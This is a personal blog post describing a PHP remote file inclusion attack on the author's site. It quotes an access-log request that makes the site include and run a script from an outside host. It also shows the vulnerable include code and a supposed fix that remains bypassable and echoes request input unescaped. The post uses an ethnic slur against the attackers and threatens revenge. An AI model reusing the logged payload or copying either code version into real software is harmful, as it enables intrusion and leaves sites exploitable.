bluemonki dot net

Ok so last week I got hacked by some previously mentioned turkish goat fuckers and I promised a run down of what happened, how and why. Oh and some revenge (mmm it tastes so good).

Ok so first off my buddy marc tells me that my site has been hacked, while I was sitting at home watching the tele and idley browsing the interweb on my iBook. So I potter over to [bluemonki.net] (that was a shameful self plug - sorry) to see [this!!].

Holy shit, I really had been hacked!!!

Anyhoo I spend the next 5 minutes checking through the SSH access logs and the changes log only to find nothing there. Then I start a quick search through the web server access log and find the following POST requests at exactly the same time as the file modification date:

85.98.221.59 - - [02/Apr/2006:07:19:14 -0400] “POST /index.php?page=http%3A%2F%2Fbarikat.org%2Fpartizan.txt%3Fcmd%3Did&&s=r& HTTP/1.1″ 200 7531 “http://beta.bluemonki.net/index.php?page=http%3A%2F%2Fbarikat.org%2Fpartizan.txt%3Fcmd%3Did&&s=r&cmd=edit&file=./index.php” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SIMBAR Enabled)”

Now this might look harmless, but in order to keep the front page looking the same while you persuse my online musings I wrote a little PHP script that included the requested page in the original page. That’s great but I did it like this:

< ?php
if (isset($_REQUEST['page']))
{
include($_REQUEST['page']);
}
else
{
include('http://www.bluemonki.net/wordpress/index.php');
}
?>

What’s wrong with that I hear you ask, well I’m not actually checking that the included page is one of mine!! And if you dig a little deeper into the access log you’ll see that the included page is this one:

http%3A%2F%2Fbarikat.org%2Fpartizan.txt

You can see it [here] (don’t worry it’s perfectly safe) *** Update this has been removed/suspended ***

This basically let goat fucker boy edit my index.php file :@ You can see GFB showing his glory to his fellow GF’s [here] (this is also perfectly safe but it’s in turkish) *** Update this is gone too ***

So I’ve now updated my include script to look like this:

< ?php if (isset($_REQUEST['page']))
{
// check that this page belongs to me
$array = explode("bluemonki.net", $_REQUEST['page']);
$test_string = $array[0];
if (0 == strcasecmp("http://www.", $test_string))
{
include($_REQUEST['page']);
}
else
{
// log the IP address and address
$domain = GetHostByName($REMOTE_ADDR);
$domain = GetHostByName($REMOTE_ADDR);
$handle = fopen("/home/bluemonk/log.txt", "a");
$today = date("Ymd:H:i:s");
fwrite($handle, chr(10) . chr(13));
fwrite($handle, $today . " ");
fwrite($handle, $domain . " ");
fwrite($handle, $_REQUEST['page']); echo "Naughty naughty! - consider your IP logged";
echo $domain . " ";
echo "Oh and I'll be taking a look at: ";
echo $_REQUEST['page'];
}
}
else
{
include('http://www.bluemonki.net/wordpress/index.php');
}
?>

So now if you try [POST example] you’ll find that it tells you to get stuffed and logs your IP at the same time. Neat eh? Yeah I thought so too.

That’s the how, next comes the revenge!!!

laterz

Technorati Tags: hack, darkboyz, bluemonki, php, include, wordpress